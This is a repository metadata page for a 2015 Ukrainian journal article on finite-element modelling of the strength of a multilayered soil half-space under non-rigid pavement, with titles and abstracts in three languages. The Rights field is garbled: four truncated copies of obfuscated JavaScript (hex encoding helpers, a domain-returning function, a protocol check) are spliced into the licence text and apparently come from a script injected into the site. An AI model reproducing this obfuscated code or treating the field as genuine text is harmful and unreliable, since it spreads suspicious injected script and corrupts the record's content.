Record Details

Чисельне дослідження міцності комбінованого багатошарового півпростору під дорожнім покриттям

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Чисельне дослідження міцності комбінованого багатошарового півпростору під дорожнім покриттям
Численное исследование прочности комбинированного многослойного полупространства под дорожным покрытием
COMPUTATIONAL INVESTIGATION OF COMPOSED MULTILAYERED HALF-SPACE STRENGTH UNDER PAVEMENT
 
Creator Talakh, Svetlana; National Aviation University
Dubik, Oleksandr; National Aviation University
 
Subject
багатошаровий ґрунтовий півпростір; граничний стан; дорожні одяги нежорсткого типу; метод скінченних елементів; пружно-пластична деформація; розрахунок на міцність
539.3:624.071:624.04

дорожные одежды нежесткого типа; метод конечных элементов; многослойное полупространство; предельное состояние; расчет на прочность; упругопластическая деформация
539.3:624.071:624.04

finite element method; limiting state;non-rigid pavements; multilayered subgradehalf-space; plastoelastic deformation; strength calculation
539.3:624.071:624.04
 
Description Стаття присвячена актуальним питанням розрахунків на міцність дорожніх одягів нежорсткого типу при взаємодії з активною зоною ґрунтової основи. Запропоновано комбіновану математичну модель багатошарового ґрунтового півпростору на основі розширеного критерію текучості Мізеса, що включає рівняння стану в приростах у заграничному стані і враховує третій інваріант тензора-девіатора напружень. Виконано чисельні дослідження за допомогою монетної схеми скінченних елементів конструкції дорожнього одягу нежорсткого типу в плоскій постановці задачі при взаємодії з активною зоною ґрунтового півпростору. Дослідження напружено-деформованого стану багатошарового півпростору проводилися при розрахунку з урахуванням розвитку пластичних деформацій та без урахування останніх. Результати досліджень показали, що при розрахунках з урахуванням розвитку пластичних деформацій максимальні переміщення збільшуються приблизно на 11%, а максимальні напруження - на 8,2%. Концентрація пластичних деформацій спостерігається в областях, прилеглих до поверхні навантаження.
Статья посвящена актуальным вопросам прочностных расчетов дорожных одежд нежесткого типа при взаимодействии с активной зоной грунтовой основы. Предложена комбинированная математическая модель многослойного грунтового полупространства на основе расширенного критерия текучести Мизеса, включающая уравнение состояния в приращениях в запредельном состоянии и учитывающая третий инвариант тензора-девиатора напряжений. Выполнены численные исследования с помощью моментной схемы конечных элементов конструкции дорожной одежды нежесткого типа в плоской постановке задачи при взаимодействии с активной зоной грунтового полупространства. Исследования напряжено-деформированного состояния многослойного полупространства проводились при расчете с учетом развития пластических деформаций и без учета последних. Результаты исследований показали, что при расчете с учетом развития пластических деформаций максимальные перемещения увеличиваются приблизительно на 11%, а максимальные напряжения – на 8,2%. Концентрация пластических деформаций наблюдается в областях, примыкающих к поверхности нагружения.
The article presents mathematical model of non-linear subgrade half-space on the basis of the von Mises advanced yieldcriterion. We have performed computational investigations of non-rigid pavement deflected mode in plane problem statement under simulation of subgrade half-space active zone including the layers of pavement. The results receiveds how the plastoelastic deformation development influences the strength of non-rigid pavement.
 
Publisher National Aviation University
 
Contributor


 
Date 2015-10-13
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/9030
10.18372/2306-1472.64.9030
 
Source Proceedings of the National Aviation University; Том 64, № 3 (2015); 97-104
Вестник Национального авиационного университета; Том 64, № 3 (2015); 97-104
Вісник Національного Авіаційного Університету; Том 64, № 3 (2015); 97-104
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ